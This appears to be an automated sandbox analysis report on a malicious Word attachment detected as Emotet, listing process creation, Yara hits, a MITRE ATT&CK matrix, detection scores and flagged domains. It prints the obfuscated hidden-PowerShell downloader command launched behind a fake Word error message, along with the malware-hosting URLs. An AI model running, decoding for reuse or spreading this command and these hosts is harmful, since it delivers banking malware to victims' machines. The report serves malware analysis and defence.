ZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10004C5A cpuid

7_2_10004C5A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,

7_2_10007D46

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting32	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information3	LSASS Memory	File and Directory Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Logon Script (Windows)	Scripting32	Security Account Manager	System Information Discovery26	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution3	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Security Software Discovery31	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter211	Network Logon Script	Network Logon Script	Masquerading11	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell3	Rc.common	Rc.common	Virtualization/Sandbox Evasion2	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection111	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MAIL-0573188.doc	67%	Virustotal		Browse
MAIL-0573188.doc	50%	Metadefender		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.2.rundll32.exe.210000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.1f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.210000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.rundll32.exe.1f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.1f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.2e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.320000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Link
veterinariadrpopui.com	7%	Virustotal	Browse
wpsapk.com	1%	Virustotal	Browse
sofsuite.com	4%	Virustotal	Browse
khanhhoahomnay.net	6%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://shop.elemenslide.com/wp-content/n/	0%	Avira URL Cloud	safe
http://veterinariadrpopui.com	100%	Avira URL Cloud	malware
http://veterinariadrpopui.com/content/5f18Q/	100%	Avira URL Cloud	malware
http://sofsuite.com/wp-includes/2jm3nIk/	100%	Avira URL Cloud	phishing
http://khanhhoahomnay.net/wordpress/CGMC/	100%	Avira URL Cloud	malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://beatlemail.net/picture.php?blogid=0	0%	Avira URL Cloud	safe
https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/	100%	Avira URL Cloud	malware
https://shop.elemenslide.com	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://shop.elemenslide.com	0%	Avira URL Cloud	safe
http://khanhhoahomnay.net	0%	Avira URL Cloud	safe
http://shop.elemenslide.com/wp-content/n/	100%	Avira URL Cloud	malware
http://sofsuite.com	0%	Avira URL Cloud	safe
http://wpsapk.com	0%	Avira URL Cloud	safe
